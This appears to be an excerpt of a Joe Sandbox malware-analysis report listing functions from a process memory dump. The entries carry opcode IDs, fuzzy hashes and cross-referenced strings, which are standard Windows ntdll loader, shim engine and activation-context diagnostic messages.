                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 600e79efac1e4ffa8c0d2854f1fe31566ecb5f97a0c4722c26e303ed024b511b
                                                  • Instruction ID: 17b1f98f26155e25d3e30736ab275dfc118006bfc9fe2d5852bb66444729be7b
                                                  • Opcode Fuzzy Hash: 600e79efac1e4ffa8c0d2854f1fe31566ecb5f97a0c4722c26e303ed024b511b
                                                  • Instruction Fuzzy Hash: F890043530100403D500735C570C707001547D0301FD1DC57F441451CDD777CD557171
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ebe62a6a1dbc905890a45723fd38bf0d0cbfa835dd578d18255fc4933f3ef557
                                                  • Instruction ID: b5999ca0bb599e609a3d0119e47d24fa4e5b116b969f1bb984a9128659c70643
                                                  • Opcode Fuzzy Hash: ebe62a6a1dbc905890a45723fd38bf0d0cbfa835dd578d18255fc4933f3ef557
                                                  • Instruction Fuzzy Hash: FF90022524100803D54072588514707001687D0601F91C856A4014514DC6268A6976F1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49fef5a119aff6522e5eba2bc9ea37f59296d1bd392309bca1a585248254c02a
                                                  • Instruction ID: 74159c7a48351f085e1293d51603539b21e4482167db9b49b18eae2891d6576d
                                                  • Opcode Fuzzy Hash: 49fef5a119aff6522e5eba2bc9ea37f59296d1bd392309bca1a585248254c02a
                                                  • Instruction Fuzzy Hash: 0790022520144443D54073584904B0F411547E1202FD1C85EA8146514CC92589596761
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 056e78b88abea0f442ebd5b365929353500a3af744ce8e2c62293fdc308bb9ff
                                                  • Instruction ID: 82ca0c3787d901b06c1e1041ab7e9662b1bf4e7274cf1f7a01c606cbcfadd540
                                                  • Opcode Fuzzy Hash: 056e78b88abea0f442ebd5b365929353500a3af744ce8e2c62293fdc308bb9ff
                                                  • Instruction Fuzzy Hash: 2990022521180043D60076684D14B07001547D0303F91C95AA4144514CC92589656561
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08ebba0c3b01942abca6b59527f2e05b3e93595578969241966228668bd0f60b
                                                  • Instruction ID: a06cf182ced81671bfea8159fb90d765b79582ba256ce2e01c38aa52499cd6ff
                                                  • Opcode Fuzzy Hash: 08ebba0c3b01942abca6b59527f2e05b3e93595578969241966228668bd0f60b
                                                  • Instruction Fuzzy Hash: D89002256010004385407268894490740156BE1211B91C966A4988510DC569896966A5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c1a46576a24813c248a322463b353607d9753533cadc8ea8d763c4bfc6505f8
                                                  • Instruction ID: a0ead7fb02b3562038ac5f8f7db41e7afc7177f232cb515f8d7bf557b3664f4c
                                                  • Opcode Fuzzy Hash: 9c1a46576a24813c248a322463b353607d9753533cadc8ea8d763c4bfc6505f8
                                                  • Instruction Fuzzy Hash: 9390023520140403D50072584908747001547D0302F91C856A9154515EC675C9957571
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 765ee88348c10340f531eb035e8fd13ca8d237aad285510cb8bedfa3d45894f6
                                                  • Instruction ID: db86ab225c15b8e3481910bd4f6cf169f72a9b1baff3822a38f1b3bf82718804
                                                  • Opcode Fuzzy Hash: 765ee88348c10340f531eb035e8fd13ca8d237aad285510cb8bedfa3d45894f6
                                                  • Instruction Fuzzy Hash: 6E90047531100043D504735C4504707005547F1301FD1CC57F7144514CC53DCD757175
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0caf76834bb87163e1cb85ba3f846861aae935360523d93b6cd37757824fcd9a
                                                  • Instruction ID: 7651dfd0853e48183120f1def05570a52837325f023b06e3f68e893e37d3c361
                                                  • Opcode Fuzzy Hash: 0caf76834bb87163e1cb85ba3f846861aae935360523d93b6cd37757824fcd9a
                                                  • Instruction Fuzzy Hash: 1290026534100443D50072584514B07001587E1301F91C85AE5054514DC629CD567166
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b6061518f50433358c94c6163a782cf848909b927cd21a3f80f1a3447d76d3e
                                                  • Instruction ID: 9c7b7c0f70fde4963c5cdd14424647187430a39ffc122ee05cefd92387c0273a
                                                  • Opcode Fuzzy Hash: 5b6061518f50433358c94c6163a782cf848909b927cd21a3f80f1a3447d76d3e
                                                  • Instruction Fuzzy Hash: 3190026520140403D54076584904607001547D0302F91C856A6054515ECA398D557175
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49dfe966cf70fb1133fa707e652c353c35590289ce5aedf6cdb084a508459e4b
                                                  • Instruction ID: 849425f53512c0fd0feba965d1087e098a001a5db25f6a8c81aede2e16ad413c
                                                  • Opcode Fuzzy Hash: 49dfe966cf70fb1133fa707e652c353c35590289ce5aedf6cdb084a508459e4b
                                                  • Instruction Fuzzy Hash: 5090043D311000034505F75C0704507005747D53517D1CC77F5005510CD731CD757171
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46dd1993ae5354975b1c366fcf59d236f2ffd39d9ae3bc9f4ca30def879e8390
                                                  • Instruction ID: 2b6b899bbd4574355ea6d8c767a75f1f862c1abedc6a936a53f974bed3ddff15
                                                  • Opcode Fuzzy Hash: 46dd1993ae5354975b1c366fcf59d236f2ffd39d9ae3bc9f4ca30def879e8390
                                                  • Instruction Fuzzy Hash: B49002A5201140938900B3588504B0B451547E0201F91C85BE5044520CC5358955A175
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df0b42964a44ffea38c1869204262d955705acab64f36bd0869cc806710c38f4
                                                  • Instruction ID: 671c7b85e76e3e1d3c48f91f822c7d9e3fe3a9c145240e434332b3caf027fa9f
                                                  • Opcode Fuzzy Hash: df0b42964a44ffea38c1869204262d955705acab64f36bd0869cc806710c38f4
                                                  • Instruction Fuzzy Hash: 9B90022560500403D54072585518707002547D0201F91D856A4014514DC6698B5976E1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53b96985ce12bc3adb658f3c4343058a59448acc87f2b531cf47831e14723f0b
                                                  • Instruction ID: ffb81df1f1245c65261321e28d2113537a9143563674e09321650b17685abb8e
                                                  • Opcode Fuzzy Hash: 53b96985ce12bc3adb658f3c4343058a59448acc87f2b531cf47831e14723f0b
                                                  • Instruction Fuzzy Hash: 4790023520100843D50072584504B47001547E0301F91C85BA4114614DC625C9557561
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e45974b4c19ab25361a98e2255ccfdf9362de801edae8bed00df13ff8c031541
                                                  • Instruction ID: a39a90743d21260232fe26a411ae19178739ea01864483aef8918f24a61c3302
                                                  • Opcode Fuzzy Hash: e45974b4c19ab25361a98e2255ccfdf9362de801edae8bed00df13ff8c031541
                                                  • Instruction Fuzzy Hash: BF90023520100803D5807258450464B001547D1301FD1C85AA4015614DCA258B5D77E1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97b3cb02e95566c165045397cda95fcf50033dfd3f503843aed28125486c08ef
                                                  • Instruction ID: e7b9192c53154fd188b932746fb1dba8edefe4ad620d1e4b88612fd71bb4bb32
                                                  • Opcode Fuzzy Hash: 97b3cb02e95566c165045397cda95fcf50033dfd3f503843aed28125486c08ef
                                                  • Instruction Fuzzy Hash: 6090023520504843D54072584504A47002547D0305F91C856A4054654DD6358E59B6A1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e8b6dd9a485a2cd601f3d03ab281af44829b8dd2b439cf0e8c86259a13d0a2a
                                                  • Instruction ID: 041311ab0202321545d3fc6d52ea90617187d1e995e190e1f83933095ceaaca9
                                                  • Opcode Fuzzy Hash: 9e8b6dd9a485a2cd601f3d03ab281af44829b8dd2b439cf0e8c86259a13d0a2a
                                                  • Instruction Fuzzy Hash: F690023560500803D55072584514747001547D0301F91C856A4014614DC7658B5976E1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1ca6c45d31e38169d38e766164fe8e6395e563c0e1e2873788bdd9edf8d5d1
                                                  • Instruction ID: 5ef6c356a37beaefafe3a0267644377bccef586f6041c6d6214403be1b01f3af
                                                  • Opcode Fuzzy Hash: ce1ca6c45d31e38169d38e766164fe8e6395e563c0e1e2873788bdd9edf8d5d1
                                                  • Instruction Fuzzy Hash: 1C90023520100803D50472584904687001547D0301F91C856AA014615ED67589957171
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9890b83e563ba2a642c95577450999901095ff994aa22e775354eb375174421
                                                  • Instruction ID: dbf8f517e0005b9bb32ee045d12dd57841c6db10958719a1348eb87d66d29d78
                                                  • Opcode Fuzzy Hash: e9890b83e563ba2a642c95577450999901095ff994aa22e775354eb375174421
                                                  • Instruction Fuzzy Hash: 0790026520200003850572584514617401A47E0201F91C866E5004550DC53589957165
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fa8d4e6d7398f9a1329e6871b6006f279d1349ea710c8f0306a566fddca39b6
                                                  • Instruction ID: 652a6192bfd8174cf78db228a0956a58b55a48586431d04c69e8ee5d1037d9f8
                                                  • Opcode Fuzzy Hash: 5fa8d4e6d7398f9a1329e6871b6006f279d1349ea710c8f0306a566fddca39b6
                                                  • Instruction Fuzzy Hash: 90900229221000034545B658070450B045557D63517D1C85AF5406550CC63189696361
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: c9e8e5d02229a646cbd5dc8f2d001ff8e8a5c43e69ca63b80a2bfb97148c9154
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Control-flow Graph
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: 40314db9b9cc9d3005dc2c3da9642e680d77c8c63a7dee8f39ad6e1f89224c16
                                                  • Instruction ID: aedf02dbef594127ca7e1be20f41e6bdd8ab2558cdeb767b267b854290cfc92d
                                                  • Opcode Fuzzy Hash: 40314db9b9cc9d3005dc2c3da9642e680d77c8c63a7dee8f39ad6e1f89224c16
                                                  • Instruction Fuzzy Hash: 79A1BE71B143218FD704EE1AC892A1ABBE5FF88358F1445ADE945EB310EBB0EC45CB91
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3600454D
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36004507
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36004460
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36004530
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 36004592
                                                  • ExecuteOptions, xrefs: 360044AB
                                                  • Execute=1, xrefs: 3600451E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: a2c32b77182c2d9ef4cf84ece18aed88043a4657e028f2b6c139a16bb9517d10
                                                  • Instruction ID: 23b93ad5687afc53444e1c5241be854b42b10cabde65d514343774d45a9dd0a7
                                                  • Opcode Fuzzy Hash: a2c32b77182c2d9ef4cf84ece18aed88043a4657e028f2b6c139a16bb9517d10
                                                  • Instruction Fuzzy Hash: 975107B5A0131AAAEB10DBA5DC86FAD77B8AF04340F440CFDD905A7181DB709A45CFA4
                                                  Strings
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF77E2
                                                  • SsHd, xrefs: 35FAA304
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 35FF77DD, 35FF7802
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF7807
                                                  • Actx , xrefs: 35FF7819, 35FF7880
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 35FF78F3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: f49b0adb7812ead2325c55767f79405fdaaa3efccc2ce23adacf843f0edae624
                                                  • Instruction ID: 501071f733ae27538155dc32b9fad2e8cd5d38371a31dbf256c1dccc1b446926
                                                  • Opcode Fuzzy Hash: f49b0adb7812ead2325c55767f79405fdaaa3efccc2ce23adacf843f0edae624
                                                  • Instruction Fuzzy Hash: 17E1B2766083818FE715CE24C890B5BB7E5BB84354F504F2DECA68B6A0D772D849CF92
                                                  Strings
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF9153
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 35FF914E, 35FF9173
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF9178
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35FF9372
                                                  • Actx , xrefs: 35FF9315
                                                  • GsHd, xrefs: 35FAD794
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 9fe622c169cd711a570aee5284815a93e5401d5f6ed32165e526e3ef1668870b
                                                  • Instruction ID: 2861008fa459034cdf9073a31925c2d485656909b641cf6dce138a7e6a8322d4
                                                  • Opcode Fuzzy Hash: 9fe622c169cd711a570aee5284815a93e5401d5f6ed32165e526e3ef1668870b
                                                  • Instruction Fuzzy Hash: 23E168B66083428BE700CE14C980B4BB7F9BF88758F414E6DE995CB691D771E944CF92
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 35F8651C
                                                    • Part of subcall function 35F86565: RtlDebugPrintTimes.NTDLL ref: 35F86614
                                                    • Part of subcall function 35F86565: RtlDebugPrintTimes.NTDLL ref: 35F8665F
                                                  Strings
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35FE9790
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 35FE977C
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 35FE97B9
                                                  • apphelp.dll, xrefs: 35F86446
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FE97A0, 35FE97C9
                                                  • LdrpInitShimEngine, xrefs: 35FE9783, 35FE9796, 35FE97BF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: 409c527a56085f349ce6ef5dca26479113ab7bc7fb4e6192743b4585d7bf22b8
                                                  • Instruction ID: 035a3a35dc2d28df25efc5f0feed2327fa05568e480d8d50449344e1ac81ba4b
                                                  • Opcode Fuzzy Hash: 409c527a56085f349ce6ef5dca26479113ab7bc7fb4e6192743b4585d7bf22b8
                                                  • Instruction Fuzzy Hash: 215180716083089FE325DF24C991E5B77E9FF94784F400D1AFA95971A0DB30D909CBA2
